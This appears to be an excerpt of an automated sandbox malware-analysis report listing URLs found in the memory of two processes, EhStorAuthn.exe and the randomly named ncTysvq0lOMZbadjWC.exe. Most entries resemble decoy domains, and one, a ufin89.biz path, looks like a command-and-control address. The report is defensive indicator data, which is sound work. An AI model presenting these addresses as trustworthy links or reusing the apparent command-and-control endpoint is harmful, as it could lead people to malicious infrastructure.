Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.cyberpolice.cn
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.douaizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.doudouzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.douquzhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.duoxiuzhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.ecschool.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.feizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.financialfree.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.fixback.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.fragmenta.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.globalheritage.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.gnag.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.guotangzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.homedreams.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.huoyazhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.idtec.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.indotex.net/binding
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.investimo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.jiujiuzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.ladance.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.laxiuzhibo.net/binding
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.lekezhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.lifediet.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.linglingzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.liufangzhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.luckydoge.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.luolizhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.luxbrand.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.lvmuzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.magnis.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.majiaozhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mamaizhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mangguozhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mengdiezhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.miaoxizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mierzhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mierzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.milianzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mishizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.motoaction.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.mynewchurch.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.nadabrahma.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.naikuaizhibo.com
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.nvdizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.nvdizhibo.net/binding
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.oneculture.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.onepacific.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.perfectfloor.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.perioimplants.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.pharco.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.qilinzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.qinglaizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.qiushuizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.roverclub.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.rsbi.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.salesa.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.sencare.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.spacebuilders.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.stayplus.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.summergames.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.supercanal.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.swisshemp.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.taffix.net/binding
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.taquzhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.taquzhibo.net/binding
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thebossclub.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.theflowerpot.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.thisit.net
Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3762178583.000000000521F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ufin89.biz
Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3762178583.000000000521F000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ufin89.biz/5o3b/
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.urbanscout.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.wanyuezhibo.net
Source: ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.workandhealth.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.wuhaozhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.wuyezhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xianglizhibo.net
Source: EhStorAuthn.exe, 00000006.00000002.3762994932.0000000007B00000.00000004.00000800.00020000.00000000.sdmp, EhStorAuthn.exe, 00000006.00000002.3761155390.00000000063E4000.00000004.10000000.00040000.00000000.sdmp, ncTysvq0lOMZbadjWC.exe, 0000000A.00000002.3760380084.0000000003E04000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.xiaokongzhibo.net
